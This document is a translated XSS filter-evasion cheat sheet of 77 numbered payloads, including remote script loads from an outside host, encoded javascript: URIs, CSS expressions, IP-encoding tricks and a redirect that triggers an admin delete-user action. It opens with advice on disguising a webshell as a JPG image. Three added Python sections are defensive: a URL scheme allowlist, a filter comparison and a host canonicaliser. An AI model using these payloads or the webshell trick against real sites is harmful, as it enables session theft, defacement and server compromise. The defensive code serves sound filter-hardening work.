Cross-site image shell

XSS cross-site code: <script>alert("")</script>

Put the code on the first line of the webshell (the "trojan"), then rename the webshell to the JPG image format; when the image-format webshell is accessed, our webshell is still executed.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multiline embedded JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters are basically useless in China, since there is nowhere they can be used.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters in the IMG tag
<IMG SRC=" javascript:alert('XSS');">
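Added note and example (not part of the original post): entries (3) to (19) all depend on a filter that searches for the literal string "javascript" before the browser has decoded character references and discarded control characters. The Python below is a defender-side check for values that are placed in href/src-style attributes; it was written for this page, not taken from it, and the function names, the allowed-scheme set and the sample values are assumptions made for the demonstration. It decodes and normalises first and then allows only listed schemes, so the spelling of the scheme no longer matters.

```python
# Added example (not from the original post): an allowlist validator for
# URL-bearing attributes (href, src, background, style url(...)). Function
# names and the sample inputs are constructed for this demonstration.
import html
import re
from typing import Optional

# Schemes the application is willing to emit into href/src attributes.
# Anything else, including javascript:, vbscript: and data:, is refused.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Browsers tolerate C0 control characters (NUL, tab, LF, CR) and spaces
# around and inside the scheme.  The "jav<tab>ascript:", "java\0script:" and
# "   javascript:" shapes in entries (11)-(19) rely on a filter that inspects
# the scheme before these characters are removed.  This is deliberately
# stricter than the URL standard: every such character is dropped anywhere.
_CONTROL_OR_SPACE = re.compile(r"[\x00-\x20\x7f]")

# A URL scheme: one ASCII letter, then letters/digits/'+'/'-'/'.', then ':'.
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def canonical_scheme(attribute_value: str) -> Optional[str]:
    """Return the lower-cased scheme a browser would act on, or None for a
    relative reference.

    The order mirrors the user agent: the value is an HTML attribute first,
    so character references (&#106;, &#x6A;, &#0000106 with no semicolon,
    &colon;, &Tab;) are decoded before anything looks at the URL.  Only then
    are control characters stripped and the scheme lower-cased.
    """
    decoded = html.unescape(attribute_value)
    cleaned = _CONTROL_OR_SPACE.sub("", decoded)
    match = _SCHEME.match(cleaned)
    return match.group(1).lower() if match else None


def is_safe_url_attribute(attribute_value: str) -> bool:
    """Allowlist check: relative URLs pass, absolute URLs need an allowed scheme.

    No blocklist of spellings of "javascript" is involved.  Case games,
    embedded whitespace, NUL bytes and numeric character references all
    canonicalise to the plain scheme name, which is then simply looked up.
    """
    scheme = canonical_scheme(attribute_value)
    return scheme is None or scheme in ALLOWED_SCHEMES


# Constructed sample values modelled on the shapes listed above, paired with
# the verdict the validator should reach.
SAMPLES = {
    "javascript:alert('XSS')": False,             # (3) plain
    "JaVaScRiPt:alert('XSS')": False,             # (4) case games
    "jav\tascript:alert('XSS');": False,          # (11) embedded tab
    "jav&#x0A;ascript:alert('XSS');": False,      # (13) encoded newline
    "java\x00script:alert('XSS')": False,         # (17) NUL byte
    "  javascript:alert('XSS');": False,          # (19) leading spaces
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)": False,  # (5)/(8)
    "&#0000106&#0000097vascript:alert(1)": False,  # (9) references without semicolons
    "vbscript:msgbox(\"XSS\")": False,            # (40) another active scheme
    "https://example.com/page": True,
    "//example.com/page": True,                   # scheme-relative, allowed
    "/relative/path?q=1": True,
}


def check_samples() -> dict:
    """Run every sample through the validator; returns {value: verdict}."""
    return {value: is_safe_url_attribute(value) for value in SAMPLES}


if __name__ == "__main__":
    for value, verdict in check_samples().items():
        flag = "OK " if verdict == SAMPLES[value] else "BAD"
        print(f"{flag} {str(verdict):5} {value!r}")
```

The check is an allowlist on the normalised scheme rather than a blocklist of dangerous words, which is why none of the encodings above turn into a bypass: whatever the input looks like, the only question asked is whether the decoded scheme is one the application chose to permit.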
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
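Added example (not from the original post): entries (23) to (27) work because the sanitiser on the receiving side is looking for well-formed tags. The Python below was written for this page; it uses constructed function names and a constructed copy of the five payloads, runs two typical regex filters and plain HTML encoding over them, and reports which shapes still leave a tag opener behind.

```python
# Added example (not from the original post): two common regex-based
# "remove the tags" filters against the half-open and unterminated payload
# shapes of entries (23)-(27), next to plain output encoding.  Function names
# and the payload set are constructed for this demonstration.
import html
import re

# Filter 1: delete everything that looks like a complete tag, '<' ... '>'.
_ANY_TAG = re.compile(r"<[^>]*>")

# Filter 2: delete only known-dangerous elements, and only when the element is
# properly closed (what most "remove <script> blocks" snippets do).
_DANGEROUS_BLOCK = re.compile(
    r"<(?:script|iframe)\b[^>]*>.*?</(?:script|iframe)\s*>", re.I | re.S
)


def strip_all_tags(text: str) -> str:
    return _ANY_TAG.sub("", text)


def strip_dangerous_blocks(text: str) -> str:
    return _DANGEROUS_BLOCK.sub("", text)


def encode_for_html_text(text: str) -> str:
    """The hardened alternative: do not try to recognise markup at all.
    Encoding '<', '>', '&' and both quote characters means the browser can
    never start a tag from user data, whatever shape the input takes."""
    return html.escape(text, quote=True)


def leaves_tag_opener(filtered: str) -> bool:
    """True if the filter output still contains '<' followed by a letter or
    '/', which the HTML tokenizer treats as the start of a tag.  A half-open
    tag at the end of user content keeps consuming the page's own markup up to
    the next '>', which is exactly what entries (26) and (27) rely on."""
    return re.search(r"<[A-Za-z/]", filtered) is not None


# Constructed payloads, one per entry above.
PAYLOADS = {
    "(23) double open brackets": '<<SCRIPT>alert("XSS");//<</SCRIPT>',
    "(24) no closing script tag": "<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>",
    "(25) no closing script tag 2": "<SCRIPT SRC=//3w.org/XSS/xss.js>",
    "(26) half-open IMG": "<IMG SRC=\"javascript:alert('XSS')\"",
    "(27) double open angle bracket": "<iframe src=http://3w.org/XSS.html <",
}

FILTERS = {
    "strip_all_tags": strip_all_tags,
    "strip_dangerous_blocks": strip_dangerous_blocks,
    "encode_for_html_text": encode_for_html_text,
}


def survival_table() -> dict:
    """For each payload and filter: does a tag opener survive the filter?"""
    return {
        name: {fname: leaves_tag_opener(f(payload)) for fname, f in FILTERS.items()}
        for name, payload in PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, row in survival_table().items():
        print(name)
        for fname, survived in row.items():
            print(f"    {fname:24} {'SURVIVES' if survived else 'removed'}")
```

Each regex misses a different shape: the strip-everything filter needs a closing '>' and so passes (26) and (27) untouched, while the blocklist filter needs a closing tag and so passes (24) and (25). Encoding has no shape to miss, because it never decides what is and is not a tag.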
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) ActionScript inside Flash can be used to mix in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; it can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with an absolute (trailing) dot
<A HREF="http://www.google.com./">XSS</A>
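Added example (not from the original post): the host spellings in (70) to (73) and the trailing dot in (76) are all accepted by the resolver, so a URL filter that compares the host as a string treats them as different hosts. The Python below was written for this page with constructed function names and sample inputs; it reduces a host to the form the resolver actually uses before comparing, following the inet_aton parsing rules (one to four dot-separated parts, each decimal, octal with a leading 0 or hex with 0x, the last part filling the remaining bytes).

```python
# Added example (not from the original post): canonicalising the numeric host
# spellings from entries (70)-(73) and the trailing-dot form from (76) before a
# URL allowlist/blocklist compares hosts.  Function names and sample inputs
# are constructed for this demonstration.
import re
from typing import Optional

# Browsers drop tab and newline characters from URLs; the spaces inside
# "6 6.000146.0x7.147" above stand in for such characters, so all C0 controls
# and spaces are removed here before parsing.
_CONTROL_OR_SPACE = re.compile(r"[\x00-\x20]")


def _parse_part(part: str) -> int:
    """One dotted component under inet_aton rules: 0x => hex, leading 0 => octal."""
    if not (part.isascii() and part.isalnum()):
        raise ValueError(part)          # rejects signs, unicode digits, etc.
    if part[:2].lower() == "0x":
        return int(part[2:], 16)        # "0x" alone raises ValueError
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def canonical_ipv4(host: str) -> Optional[str]:
    """Return the dotted-quad form of any inet_aton-style numeric host
    (a, a.b, a.b.c or a.b.c.d; each part decimal, octal or hex), or None if
    the host is not numeric.  As in inet_aton the last part fills all the
    remaining bytes, so "3232235521", "0xc0.0xa8.0x00.0x01" and
    "0300.0250.0000.0001" are one and the same address."""
    parts = _CONTROL_OR_SPACE.sub("", host).split(".")
    if not 1 <= len(parts) <= 4 or "" in parts:
        return None
    try:
        numbers = [_parse_part(p) for p in parts]
    except ValueError:
        return None
    widths = [8] * (len(numbers) - 1) + [8 * (5 - len(numbers))]
    value = 0
    for number, width in zip(numbers, widths):
        if not 0 <= number < (1 << width):
            return None                 # component does not fit its field
        value = (value << width) | number
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(host: str) -> str:
    """Canonical form for comparison: numeric hosts become dotted quads; names
    are lower-cased (DNS is case-insensitive) and lose the trailing dot that
    marks an absolute name, entry (76)."""
    numeric = canonical_ipv4(host)
    if numeric is not None:
        return numeric
    return _CONTROL_OR_SPACE.sub("", host).lower().rstrip(".")


def same_host(a: str, b: str) -> bool:
    """Compare hosts the way the resolver effectively will, not as strings."""
    return canonical_host(a) == canonical_host(b)


if __name__ == "__main__":
    for spelling in ("3232235521", "0xc0.0xa8.0x00.0x01",
                     "0300.0250.0000.0001", "6 6.000146.0x7.147",
                     "www.Google.com."):
        print(f"{spelling!r:28} -> {canonical_host(spelling)}")
```

Note that (74) and (75) are not host equivalences: google.com and www.google.com are different names, so same_host keeps them apart; only the resolver-level spellings collapse.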
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>